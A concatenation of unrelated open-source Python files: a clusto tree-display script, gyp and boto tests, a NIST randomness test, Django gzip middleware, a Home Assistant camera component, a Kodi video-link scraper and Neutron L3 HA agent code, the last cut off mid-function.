from itertools import chain
import clusto
from clusto import script_helper
class Colors(object):
"""ANSI color escape sequences class."""
mapping = {'BRIGHT': '\033[1m',
'GREEN': '\033[32m',
'MAGENTA': '\033[35m',
'YELLOW': '\033[33m',
'RESET': '\033[0m'}
def __init__(self, enabled=False):
"""Construct instance with color enabled or disabled."""
# Could default to true if stdout is a tty and not on Windows,
# but for now we don't try to guess.
self.enabled = enabled
def __getattr__(self, name):
"""Return ANSI color escape sequence if color is enabled."""
if self.enabled:
return self.mapping[name]
else:
assert name in self.mapping
return ''
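# Editor's note: Colors(enabled=True).GREEN returns the ANSI escape
# '\033[32m', while Colors(enabled=False).GREEN returns '' (after
# asserting the attribute name is a known color).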
class Tree(script_helper.Script):
"""
Display clusto objects, recursively, with attributes, and/or in color.
This script queries for a specified clusto object and attributes and
optionally also queries parent or contained objects, recursively.
It displays a simple, human-readable indented tree, with different
colors for clusto keys, subkeys, and values if color is enabled.
"""
def print_obj(self, obj, attrs, indent=0, color=False):
"""Print indented object, optionally with attributes or in color."""
colors = Colors(enabled=color)
indent_txt = "\t" * indent
# Clusto object name.
txt = "{indent}* {name}".format(
indent=indent_txt,
name=colors.BRIGHT + obj.name + colors.RESET)
# Clusto object attributes.
if 'ALL' in attrs:
attributes = obj.attrs()
else:
attributes = chain.from_iterable(obj.attrs(attr)
for attr in attrs)
for x in attributes:
if x.subkey:
subkey_txt = ".{subkey}".format(
subkey=colors.MAGENTA + str(x.subkey) + colors.RESET
)
else:
subkey_txt = ""
txt += "\n{indent}| {key}{subkey} = {value}".format(
indent=indent_txt,
key=colors.GREEN + str(x.key) + colors.RESET,
subkey=subkey_txt,
value=colors.YELLOW + str(x.value) + colors.RESET
)
print(txt)
def print_tree(self, root, attrs, direction, indent=0, color=False):
"""Print parent or contained object attributes, recursively."""
# Alternatively, we could call obj.attrs(merge_container_attrs=True),
# and use the entity attribute of each clusto attribute to
# recreate the tree.
for parent in getattr(root, direction)():
self.print_obj(parent, attrs, indent=indent, color=color)
self.print_tree(parent, attrs, direction, indent=indent + 1,
color=color)
def run(self, args):
"""Execute script, passing script arguments to methods."""
obj = clusto.get_by_name(args.obj)
attrs = args.attrs
self.print_obj(obj, attrs, indent=0, color=args.color)
if args.parents or args.contents:
if args.parents:
direction = 'parents'
else:
direction = 'contents'
self.print_tree(obj, attrs, direction, indent=1,
color=args.color)
def _add_arguments(self, parser):
parser.add_argument('obj', metavar='object', help="clusto object")
parser.add_argument('attrs', metavar='attributes', nargs='*',
help="clusto attribute keys, ALL for all")
direction = parser.add_mutually_exclusive_group()
direction.add_argument('-p', '--parents', action='store_true',
default=False,
help="query parent objects, recursively")
direction.add_argument('-c', '--contents', action='store_true',
default=False,
help="query contained objects, recursively")
parser.add_argument('-C', '--color', action='store_true',
default=False, help="enable color output")
def main():
"""Execute script with clusto script_helper."""
attr, args = script_helper.init_arguments(Tree)
return attr.run(args)
if __name__ == '__main__':
sys.exit(main())
| bsd-3-clause |
Samsung/skia | third_party/externals/gyp/test/msvs/missing_sources/gyptest-missing.py | 315 | 1413 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that missing 'sources' files are treated as fatal errors when the
the generator flag 'msvs_error_on_missing_sources' is set.
"""
import TestGyp
import os
import sys
if sys.platform == 'win32':
test = TestGyp.TestGyp(formats=['msvs', 'ninja'], workdir='workarea_all')
# With the flag not set
test.run_gyp('hello_missing.gyp')
# With the flag explicitly set to 0
try:
os.environ['GYP_GENERATOR_FLAGS'] = 'msvs_error_on_missing_sources=0'
test.run_gyp('hello_missing.gyp')
finally:
del os.environ['GYP_GENERATOR_FLAGS']
# With the flag explicitly set to 1
try:
os.environ['GYP_GENERATOR_FLAGS'] = 'msvs_error_on_missing_sources=1'
# Test to make sure GYP raises an exception (exit status 1). Since this will
# also print a backtrace, ensure that TestGyp is not checking that stderr is
# empty by specifying None, which means do not perform any checking.
# Instead, stderr is checked below to ensure it contains the expected
# output.
test.run_gyp('hello_missing.gyp', status=1, stderr=None)
finally:
del os.environ['GYP_GENERATOR_FLAGS']
test.must_contain_any_line(test.stderr(),
["Missing input files:"])
test.pass_test()
| bsd-3-clause |
palladius/gcloud | packages/gsutil/boto/tests/integration/gs/test_versioning.py | 1 | 9784 | # -*- coding: utf-8 -*-
# Copyright (c) 2012, Google, Inc.
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""Unit tests for GS versioning support."""
from xml import sax
from boto import handler
from boto.gs import acl
from tests.integration.gs.testcase import GSTestCase
class GSVersioningTest(GSTestCase):
def testVersioningToggle(self):
b = self._MakeBucket()
self.assertFalse(b.get_versioning_status())
b.configure_versioning(True)
self.assertTrue(b.get_versioning_status())
b.configure_versioning(False)
self.assertFalse(b.get_versioning_status())
def testDeleteVersionedKey(self):
b = self._MakeVersionedBucket()
k = b.new_key("foo")
s1 = "test1"
k.set_contents_from_string(s1)
k = b.get_key("foo")
g1 = k.generation
s2 = "test2"
k.set_contents_from_string(s2)
k = b.get_key("foo")
g2 = k.generation
versions = list(b.list_versions())
self.assertEqual(len(versions), 2)
self.assertEqual(versions[0].name, "foo")
self.assertEqual(versions[1].name, "foo")
generations = [k.generation for k in versions]
self.assertIn(g1, generations)
self.assertIn(g2, generations)
# Delete "current" version and make sure that version is no longer
# visible from a basic GET call.
k = b.get_key("foo")
k.delete()
self.assertIsNone(b.get_key("foo"))
# Both old versions should still be there when listed using the versions
# query parameter.
versions = list(b.list_versions())
self.assertEqual(len(versions), 2)
self.assertEqual(versions[0].name, "foo")
self.assertEqual(versions[1].name, "foo")
generations = [k.generation for k in versions]
self.assertIn(g1, generations)
self.assertIn(g2, generations)
# Delete generation 2 and make sure it's gone.
b.delete_key("foo", generation=g2)
versions = list(b.list_versions())
self.assertEqual(len(versions), 1)
self.assertEqual(versions[0].name, "foo")
self.assertEqual(versions[0].generation, g1)
# Delete generation 1 and make sure it's gone.
b.delete_key("foo", generation=g1)
versions = list(b.list_versions())
self.assertEqual(len(versions), 0)
def testGetVersionedKey(self):
b = self._MakeVersionedBucket()
k = b.new_key("foo")
s1 = "test1"
k.set_contents_from_string(s1)
k = b.get_key("foo")
g1 = k.generation
o1 = k.get_contents_as_string()
self.assertEqual(o1, s1)
s2 = "test2"
k.set_contents_from_string(s2)
k = b.get_key("foo")
g2 = k.generation
self.assertNotEqual(g2, g1)
o2 = k.get_contents_as_string()
self.assertEqual(o2, s2)
k = b.get_key("foo", generation=g1)
self.assertEqual(k.get_contents_as_string(), s1)
k = b.get_key("foo", generation=g2)
self.assertEqual(k.get_contents_as_string(), s2)
def testVersionedBucketCannedAcl(self):
b = self._MakeVersionedBucket()
k = b.new_key("foo")
s1 = "test1"
k.set_contents_from_string(s1)
k = b.get_key("foo")
g1 = k.generation
s2 = "test2"
k.set_contents_from_string(s2)
k = b.get_key("foo")
g2 = k.generation
acl1g1 = b.get_acl("foo", generation=g1)
acl1g2 = b.get_acl("foo", generation=g2)
owner1g1 = acl1g1.owner.id
owner1g2 = acl1g2.owner.id
self.assertEqual(owner1g1, owner1g2)
entries1g1 = acl1g1.entries.entry_list
entries1g2 = acl1g2.entries.entry_list
self.assertEqual(len(entries1g1), len(entries1g2))
b.set_acl("public-read", key_name="foo", generation=g1)
acl2g1 = b.get_acl("foo", generation=g1)
acl2g2 = b.get_acl("foo", generation=g2)
entries2g1 = acl2g1.entries.entry_list
entries2g2 = acl2g2.entries.entry_list
self.assertEqual(len(entries2g2), len(entries1g2))
public_read_entries1 = [e for e in entries2g1 if e.permission == "READ"
and e.scope.type == acl.ALL_USERS]
public_read_entries2 = [e for e in entries2g2 if e.permission == "READ"
and e.scope.type == acl.ALL_USERS]
self.assertEqual(len(public_read_entries1), 1)
self.assertEqual(len(public_read_entries2), 0)
def testVersionedBucketXmlAcl(self):
b = self._MakeVersionedBucket()
k = b.new_key("foo")
s1 = "test1"
k.set_contents_from_string(s1)
k = b.get_key("foo")
g1 = k.generation
s2 = "test2"
k.set_contents_from_string(s2)
k = b.get_key("foo")
g2 = k.generation
acl1g1 = b.get_acl("foo", generation=g1)
acl1g2 = b.get_acl("foo", generation=g2)
owner1g1 = acl1g1.owner.id
owner1g2 = acl1g2.owner.id
self.assertEqual(owner1g1, owner1g2)
entries1g1 = acl1g1.entries.entry_list
entries1g2 = acl1g2.entries.entry_list
self.assertEqual(len(entries1g1), len(entries1g2))
acl_xml = (
'<ACCESSControlList><EntrIes><Entry>' +
'<Scope type="AllUsers"></Scope><Permission>READ</Permission>' +
'</Entry></EntrIes></ACCESSControlList>')
aclo = acl.ACL()
h = handler.XmlHandler(aclo, b)
sax.parseString(acl_xml, h)
b.set_acl(aclo, key_name="foo", generation=g1)
acl2g1 = b.get_acl("foo", generation=g1)
acl2g2 = b.get_acl("foo", generation=g2)
entries2g1 = acl2g1.entries.entry_list
entries2g2 = acl2g2.entries.entry_list
self.assertEqual(len(entries2g2), len(entries1g2))
public_read_entries1 = [e for e in entries2g1 if e.permission == "READ"
and e.scope.type == acl.ALL_USERS]
public_read_entries2 = [e for e in entries2g2 if e.permission == "READ"
and e.scope.type == acl.ALL_USERS]
self.assertEqual(len(public_read_entries1), 1)
self.assertEqual(len(public_read_entries2), 0)
def testVersionedObjectCannedAcl(self):
b = self._MakeVersionedBucket()
k = b.new_key("foo")
s1 = "test1"
k.set_contents_from_string(s1)
k = b.get_key("foo")
g1 = k.generation
s2 = "test2"
k.set_contents_from_string(s2)
k = b.get_key("foo")
g2 = k.generation
acl1g1 = b.get_acl("foo", generation=g1)
acl1g2 = b.get_acl("foo", generation=g2)
owner1g1 = acl1g1.owner.id
owner1g2 = acl1g2.owner.id
self.assertEqual(owner1g1, owner1g2)
entries1g1 = acl1g1.entries.entry_list
entries1g2 = acl1g2.entries.entry_list
self.assertEqual(len(entries1g1), len(entries1g2))
b.set_acl("public-read", key_name="foo", generation=g1)
acl2g1 = b.get_acl("foo", generation=g1)
acl2g2 = b.get_acl("foo", generation=g2)
entries2g1 = acl2g1.entries.entry_list
entries2g2 = acl2g2.entries.entry_list
self.assertEqual(len(entries2g2), len(entries1g2))
public_read_entries1 = [e for e in entries2g1 if e.permission == "READ"
and e.scope.type == acl.ALL_USERS]
public_read_entries2 = [e for e in entries2g2 if e.permission == "READ"
and e.scope.type == acl.ALL_USERS]
self.assertEqual(len(public_read_entries1), 1)
self.assertEqual(len(public_read_entries2), 0)
def testCopyVersionedKey(self):
b = self._MakeVersionedBucket()
k = b.new_key("foo")
s1 = "test1"
k.set_contents_from_string(s1)
k = b.get_key("foo")
g1 = k.generation
s2 = "test2"
k.set_contents_from_string(s2)
b2 = self._MakeVersionedBucket()
b2.copy_key("foo2", b.name, "foo", src_generation=g1)
k2 = b2.get_key("foo2")
s3 = k2.get_contents_as_string()
self.assertEqual(s3, s1)
def testKeyGenerationUpdatesOnSet(self):
b = self._MakeVersionedBucket()
k = b.new_key("foo")
self.assertIsNone(k.generation)
k.set_contents_from_string("test1")
g1 = k.generation
self.assertRegexpMatches(g1, r'[0-9]+')
self.assertEqual(k.meta_generation, '1')
k.set_contents_from_string("test2")
g2 = k.generation
self.assertNotEqual(g1, g2)
self.assertRegexpMatches(g2, r'[0-9]+')
self.assertGreater(int(g2), int(g1))
self.assertEqual(k.meta_generation, '1')
| gpl-3.0 |
dj-on-github/sp800_22_tests | sp800_22_longest_run_ones_in_a_block_test.py | 1 | 3544 | #!/usr/bin/env python
# sp800_22_longest_run_ones_in_a_block_test.py
#
# Copyright (C) 2017 David Johnston
# This program is distributed under the terms of the GNU General Public License.
#
# This file is part of sp800_22_tests.
#
# sp800_22_tests is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# sp800_22_tests is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with sp800_22_tests. If not, see <http://www.gnu.org/licenses/>.
from __future__ import print_function
import math
#from scipy.special import gamma, gammainc, gammaincc
from gamma_functions import *
import random
def probs(K,M,i):
M8 = [0.2148, 0.3672, 0.2305, 0.1875]
M128 = [0.1174, 0.2430, 0.2493, 0.1752, 0.1027, 0.1124]
M512 = [0.1170, 0.2460, 0.2523, 0.1755, 0.1027, 0.1124]
M1000 = [0.1307, 0.2437, 0.2452, 0.1714, 0.1002, 0.1088]
M10000 = [0.0882, 0.2092, 0.2483, 0.1933, 0.1208, 0.0675, 0.0727]
if (M == 8): return M8[i]
elif (M == 128): return M128[i]
elif (M == 512): return M512[i]
elif (M == 1000): return M1000[i]
else: return M10000[i]
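# Editor's note: the tables above hold the pi_i category probabilities
# tabulated in NIST SP 800-22 (section 2.4, Longest Run of Ones in a
# Block) for each supported block size M.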
def longest_run_ones_in_a_block_test(bits):
n = len(bits)
if n < 128:
return (False,1.0,None)
elif n<6272:
M = 8
elif n<750000:
M = 128
else:
M = 10000
# compute new values for K & N
if M==8:
K=3
N=16
elif M==128:
K=5
N=49
else:
K=6
N=75
# Table of frequencies
v = [0,0,0,0,0,0,0]
for i in range(N): # over each block
#find longest run
block = bits[i*M:((i+1)*M)] # Block i
run = 0
longest = 0
for j in range(M): # Count the bits.
if block[j] == 1:
run += 1
if run > longest:
longest = run
else:
run = 0
if M == 8:
if longest <= 1: v[0] += 1
elif longest == 2: v[1] += 1
elif longest == 3: v[2] += 1
else: v[3] += 1
elif M == 128:
if longest <= 4: v[0] += 1
elif longest == 5: v[1] += 1
elif longest == 6: v[2] += 1
elif longest == 7: v[3] += 1
elif longest == 8: v[4] += 1
else: v[5] += 1
else:
if longest <= 10: v[0] += 1
elif longest == 11: v[1] += 1
elif longest == 12: v[2] += 1
elif longest == 13: v[3] += 1
elif longest == 14: v[4] += 1
elif longest == 15: v[5] += 1
else: v[6] += 1
# Compute Chi-Sq
chi_sq = 0.0
for i in range(K+1):
p_i = probs(K,M,i)
upper = (v[i] - N*p_i)**2
lower = N*p_i
chi_sq += upper/lower
print(" n = "+str(n))
print(" K = "+str(K))
print(" M = "+str(M))
print(" N = "+str(N))
print(" chi_sq = "+str(chi_sq))
p = gammaincc(K/2.0, chi_sq/2.0)
success = (p >= 0.01)
return (success,p,None)
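# Editor's sketch: exercising the test with pseudo-random input.
#     bits = [random.randint(0, 1) for _ in range(10**4)]
#     success, p, _ = longest_run_ones_in_a_block_test(bits)
# A fair generator should usually pass (p >= 0.01).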
| gpl-2.0 |
nhippenmeyer/django | django/middleware/gzip.py | 478 | 1831 | import re
from django.utils.cache import patch_vary_headers
from django.utils.text import compress_sequence, compress_string
re_accepts_gzip = re.compile(r'\bgzip\b')
class GZipMiddleware(object):
"""
This middleware compresses content if the browser allows gzip compression.
It sets the Vary header accordingly, so that caches will base their storage
on the Accept-Encoding header.
"""
def process_response(self, request, response):
# It's not worth attempting to compress really short responses.
if not response.streaming and len(response.content) < 200:
return response
# Avoid gzipping if we've already got a content-encoding.
if response.has_header('Content-Encoding'):
return response
patch_vary_headers(response, ('Accept-Encoding',))
ae = request.META.get('HTTP_ACCEPT_ENCODING', '')
if not re_accepts_gzip.search(ae):
return response
if response.streaming:
# Delete the `Content-Length` header for streaming content, because
# we won't know the compressed size until we stream it.
response.streaming_content = compress_sequence(response.streaming_content)
del response['Content-Length']
else:
# Return the compressed content only if it's actually shorter.
compressed_content = compress_string(response.content)
if len(compressed_content) >= len(response.content):
return response
response.content = compressed_content
response['Content-Length'] = str(len(response.content))
if response.has_header('ETag'):
response['ETag'] = re.sub('"$', ';gzip"', response['ETag'])
response['Content-Encoding'] = 'gzip'
return response
| bsd-3-clause |
joopert/home-assistant | homeassistant/components/august/camera.py | 5 | 2038 | """Support for August camera."""
from datetime import timedelta
import requests
from homeassistant.components.camera import Camera
from . import DATA_AUGUST, DEFAULT_TIMEOUT
SCAN_INTERVAL = timedelta(seconds=5)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up August cameras."""
data = hass.data[DATA_AUGUST]
devices = []
for doorbell in data.doorbells:
devices.append(AugustCamera(data, doorbell, DEFAULT_TIMEOUT))
add_entities(devices, True)
class AugustCamera(Camera):
"""An implementation of a Canary security camera."""
def __init__(self, data, doorbell, timeout):
"""Initialize a Canary security camera."""
super().__init__()
self._data = data
self._doorbell = doorbell
self._timeout = timeout
self._image_url = None
self._image_content = None
@property
def name(self):
"""Return the name of this device."""
return self._doorbell.device_name
@property
def is_recording(self):
"""Return true if the device is recording."""
return self._doorbell.has_subscription
@property
def motion_detection_enabled(self):
"""Return the camera motion detection status."""
return True
@property
def brand(self):
"""Return the camera brand."""
return "August"
@property
def model(self):
"""Return the camera model."""
return "Doorbell"
def camera_image(self):
"""Return bytes of camera image."""
latest = self._data.get_doorbell_detail(self._doorbell.device_id)
        if self._image_url != latest.image_url:  # compare by value, not identity
self._image_url = latest.image_url
self._image_content = requests.get(
self._image_url, timeout=self._timeout
).content
return self._image_content
@property
def unique_id(self) -> str:
"""Get the unique id of the camera."""
return f"{self._doorbell.device_id:s}_camera"
| apache-2.0 |
markeTIC/l10n-spain | l10n_es_aeat_mod340/__init__.py | 14 | 1171 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (c) 20011 Ting (http://www.ting.es)
# Copyright (c) 2011-2013 Acysos S.L. (http://acysos.com)
# Ignacio Ibeas Izquierdo <ignacio@acysos.com>
#
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import report
from . import wizard
from . import models
| agpl-3.0 |
Coelhon/MasterRepo.repository | plugin.video.zen/resources/lib/sources/myvideolink.py | 1 | 6153 | # -*- coding: utf-8 -*-
'''
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re,urllib,urlparse,random
from resources.lib.modules import control
from resources.lib.modules import cleantitle
from resources.lib.modules import client
debridstatus = control.setting('debridsources')
from resources.lib.modules.common import random_agent
from BeautifulSoup import BeautifulSoup
from schism_net import OPEN_URL
import requests
from schism_commons import quality_tag, google_tag, parseDOM, replaceHTMLCodes ,cleantitle_get, cleantitle_get_2, cleantitle_query, get_size, cleantitle_get_full
class source:
def __init__(self):
self.domains = ['newmyvideolink.xyz']
self.base_link = control.setting('myvideolink_base')
        if not self.base_link:
            self.base_link = 'http://newmyvideolink.xyz'
self.search_link = '?s=%s+%s'
# r = client.parseDOM(req, 'h2', attrs = {'class': 'post-title'})
# r = [(client.parseDOM(i, 'a', ret='href'), client.parseDOM(i, 'a', ret='title')) for i in r]
def movie(self, imdb, title, year):
self.zen_url = []
try:
            if debridstatus != 'true': raise Exception()
            print("MYVIDEOLINK 2")
self.real_link = self.base_link
title = cleantitle.getsearch(title)
cleanmovie = cleantitle.get(title)
type = 'zen_movies'
query = self.search_link % (urllib.quote_plus(title),year)
query = urlparse.urljoin(self.real_link, query)
req = OPEN_URL(query).content
r = client.parseDOM(req, 'h2', attrs = {'class': 'post-titl.+?'})
r = [(client.parseDOM(i, 'a', ret='href'), client.parseDOM(i, 'a', ret='title')) for i in r]
r = [(i[0][0], i[1][0]) for i in r ]
r = [(i[0], i[1]) for i in r if cleanmovie in cleantitle.get(i[1]) and year in i[1]]
u = [(i[0].encode('utf-8'), i[1].encode('utf-8'), type) for i in r]
self.zen_url += u
print ("MOVIES PASSED MYVIDEOLINK", self.zen_url)
return self.zen_url
except:
return
def tvshow(self, imdb, tvdb, tvshowtitle, year):
try:
url = {'tvshowtitle': tvshowtitle, 'year': year}
url = urllib.urlencode(url)
return url
except:
return
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
self.zen_url = []
try:
            if debridstatus != 'true': raise Exception()
data = urlparse.parse_qs(url)
data = dict([(i, data[i][0]) if data[i] else (i, '') for i in data])
title = data['tvshowtitle'] if 'tvshowtitle' in data else data['title']
title = cleantitle.getsearch(title)
cleanmovie = cleantitle.get(title)
self.real_link = self.base_link
type = 'zen_shows'
data['season'], data['episode'] = season, episode
episodecheck = 'S%02dE%02d' % (int(data['season']), int(data['episode']))
episodecheck = str(episodecheck).lower()
query = 'S%02dE%02d' % (int(data['season']), int(data['episode']))
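            # e.g. season=1, episode=5 -> 'S01E05'; the lower-cased
            # episodecheck form is what result titles are matched against.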
query = self.search_link % (urllib.quote_plus(title),query)
query = urlparse.urljoin(self.real_link, query)
req = OPEN_URL(query).content
r = client.parseDOM(req, 'h2', attrs = {'class': 'post-titl.+?'})
r = [(client.parseDOM(i, 'a', ret='href'), client.parseDOM(i, 'a', ret='title')) for i in r]
r = [(i[0][0], i[1][0]) for i in r ]
r = [(i[0], i[1]) for i in r if cleanmovie in cleantitle.get(i[1]) and episodecheck in cleantitle.get(i[1])]
u = [(i[0].encode('utf-8'), i[1].encode('utf-8'), type) for i in r]
self.zen_url += u
print ("MYVIDEOLINK SHOWS", self.zen_url)
return self.zen_url
except:
return
def get_refresh(self):
r = OPEN_URL(self.base_link, timeout='10').text
print ("MYVIDEOLINK OPENURL", r)
        matches = re.findall('<div class="post">(.+?)</div>', r)
        checkrefresh = matches[0] if matches else ''
        checkrefresh2 = re.findall('<meta http-equiv="refresh"', r)
if checkrefresh and "http" in checkrefresh:
print ("MYVIDEOLINK FOUND REDIRECT")
s = checkrefresh.encode('utf-8')
print ("MYVIDEOLINK REDIRECT", s)
if not s.startswith("http"): s = "http://" + s
url = s.encode('utf-8')
return url
elif checkrefresh2:
print ("MYVIDEOLINK FOUND REDIRECT")
s = re.findall("URL='(http.+?)'", r)[0]
print ("MYVIDEOLINK REDIRECT", s)
url = s.encode('utf-8')
return url
else:
url = client.request(self.base_link, output='geturl')
return url
def sources(self, url, hostDict, hostprDict):
try:
sources = []
for url,title,type in self.zen_url:
req = OPEN_URL(url).content
            pattern = '<h1>(.*?)</h1>(.*?)</ul>'
html = re.compile(pattern, re.DOTALL).findall(req)
for titles, block in html:
quality = "SD"
quality = quality_tag(titles)
info = ''
if "hevc" in titles.lower(): info = "HEVC"
info = get_size(block)
links = re.compile('href="([^"]+)').findall(block)
for href in links:
if any(value in href for value in hostprDict):
try:host = re.findall('([\w]+[.][\w]+)$', urlparse.urlparse(href.strip().lower()).netloc)[0]
except: host = 'Videomega'
url = client.replaceHTMLCodes(href)
url = url.encode('utf-8')
sources.append({'source': host, 'quality': quality, 'provider': 'Myvideolink', 'url': url, 'info': info,'direct': False, 'debridonly': True})
return sources
except:
return sources
def resolve(self, url):
return url | gpl-2.0 |
MaximNevrov/neutron | neutron/agent/l3/ha.py | 6 | 7240 | # Copyright (c) 2014 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import eventlet
from oslo_config import cfg
from oslo_log import log as logging
import webob
from neutron._i18n import _, _LI
from neutron.agent.linux import keepalived
from neutron.agent.linux import utils as agent_utils
from neutron.common import utils as common_utils
from neutron.notifiers import batch_notifier
LOG = logging.getLogger(__name__)
KEEPALIVED_STATE_CHANGE_SERVER_BACKLOG = 4096
OPTS = [
cfg.StrOpt('ha_confs_path',
default='$state_path/ha_confs',
help=_('Location to store keepalived/conntrackd '
'config files')),
cfg.StrOpt('ha_vrrp_auth_type',
default='PASS',
choices=keepalived.VALID_AUTH_TYPES,
help=_('VRRP authentication type')),
cfg.StrOpt('ha_vrrp_auth_password',
help=_('VRRP authentication password'),
secret=True),
cfg.IntOpt('ha_vrrp_advert_int',
default=2,
help=_('The advertisement interval in seconds')),
]
class KeepalivedStateChangeHandler(object):
def __init__(self, agent):
self.agent = agent
@webob.dec.wsgify(RequestClass=webob.Request)
def __call__(self, req):
router_id = req.headers['X-Neutron-Router-Id']
state = req.headers['X-Neutron-State']
self.enqueue(router_id, state)
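    # Notifications arrive as WSGI requests over a unix domain socket; the
    # router id and the new keepalived state ('master', 'backup' or 'fault')
    # are carried in the two headers read above.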
def enqueue(self, router_id, state):
LOG.debug('Handling notification for router '
'%(router_id)s, state %(state)s', {'router_id': router_id,
'state': state})
self.agent.enqueue_state_change(router_id, state)
class L3AgentKeepalivedStateChangeServer(object):
def __init__(self, agent, conf):
self.agent = agent
self.conf = conf
agent_utils.ensure_directory_exists_without_file(
self.get_keepalived_state_change_socket_path(self.conf))
@classmethod
def get_keepalived_state_change_socket_path(cls, conf):
return os.path.join(conf.state_path, 'keepalived-state-change')
def run(self):
server = agent_utils.UnixDomainWSGIServer(
'neutron-keepalived-state-change')
server.start(KeepalivedStateChangeHandler(self.agent),
self.get_keepalived_state_change_socket_path(self.conf),
workers=0,
backlog=KEEPALIVED_STATE_CHANGE_SERVER_BACKLOG)
server.wait()
class AgentMixin(object):
def __init__(self, host):
self._init_ha_conf_path()
super(AgentMixin, self).__init__(host)
self.state_change_notifier = batch_notifier.BatchNotifier(
self._calculate_batch_duration(), self.notify_server)
eventlet.spawn(self._start_keepalived_notifications_server)
def _start_keepalived_notifications_server(self):
state_change_server = (
L3AgentKeepalivedStateChangeServer(self, self.conf))
state_change_server.run()
def _calculate_batch_duration(self):
        # A backup router becomes the master after missing three
        # consecutive advertisements from the current master.
detection_time = self.conf.ha_vrrp_advert_int * 3
# Keepalived takes a couple of seconds to configure the VIPs
configuration_time = 2
# Give it enough slack to batch all events due to the same failure
return (detection_time + configuration_time) * 2
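    # Worked example for _calculate_batch_duration, assuming the default
    # ha_vrrp_advert_int of 2 seconds: detection_time = 2 * 3 = 6, so the
    # batch window is (6 + 2) * 2 = 16 seconds.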
def enqueue_state_change(self, router_id, state):
LOG.info(_LI('Router %(router_id)s transitioned to %(state)s'),
{'router_id': router_id,
'state': state})
try:
ri = self.router_info[router_id]
except KeyError:
LOG.info(_LI('Router %s is not managed by this agent. It was '
'possibly deleted concurrently.'), router_id)
return
self._configure_ipv6_ra_on_ext_gw_port_if_necessary(ri, state)
if self.conf.enable_metadata_proxy:
self._update_metadata_proxy(ri, router_id, state)
self._update_radvd_daemon(ri, state)
self.state_change_notifier.queue_event((router_id, state))
def _configure_ipv6_ra_on_ext_gw_port_if_necessary(self, ri, state):
        # If IPv6 is enabled on the platform, the ipv6_gateway config flag
        # is not set, and the external network associated with the router
        # does not include any IPv6 subnet, enable the gateway interface to
        # accept Router Advertisements from the upstream router for the
        # default route.
ex_gw_port_id = ri.ex_gw_port and ri.ex_gw_port['id']
if state == 'master' and ex_gw_port_id and ri.use_ipv6:
gateway_ips = ri._get_external_gw_ips(ri.ex_gw_port)
if not ri.is_v6_gateway_set(gateway_ips):
interface_name = ri.get_external_device_name(ex_gw_port_id)
if ri.router.get('distributed', False):
namespace = ri.ha_namespace
else:
namespace = ri.ns_name
ri.driver.configure_ipv6_ra(namespace, interface_name)
def _update_metadata_proxy(self, ri, router_id, state):
if state == 'master':
LOG.debug('Spawning metadata proxy for router %s', router_id)
self.metadata_driver.spawn_monitored_metadata_proxy(
self.process_monitor, ri.ns_name, self.conf.metadata_port,
self.conf, router_id=ri.router_id)
else:
LOG.debug('Closing metadata proxy for router %s', router_id)
self.metadata_driver.destroy_monitored_metadata_proxy(
self.process_monitor, ri.router_id, self.conf)
def _update_radvd_daemon(self, ri, state):
# Radvd has to be spawned only on the Master HA Router. If there are
# any state transitions, we enable/disable radvd accordingly.
if state == 'master':
ri.enable_radvd()
else:
ri.disable_radvd()
def notify_server(self, batched_events):
translation_map = {'master': 'active',
'backup': 'standby',
'fault': 'standby'}
translated_states = dict((router_id, translation_map[state]) for
router_id, state in batched_events)
LOG.debug('Updating server with HA routers states %s',
translated_states)
self.plugin_rpc.update_ha_routers_states(
self.context, translated_states)
def _init_ha_conf_path(self):
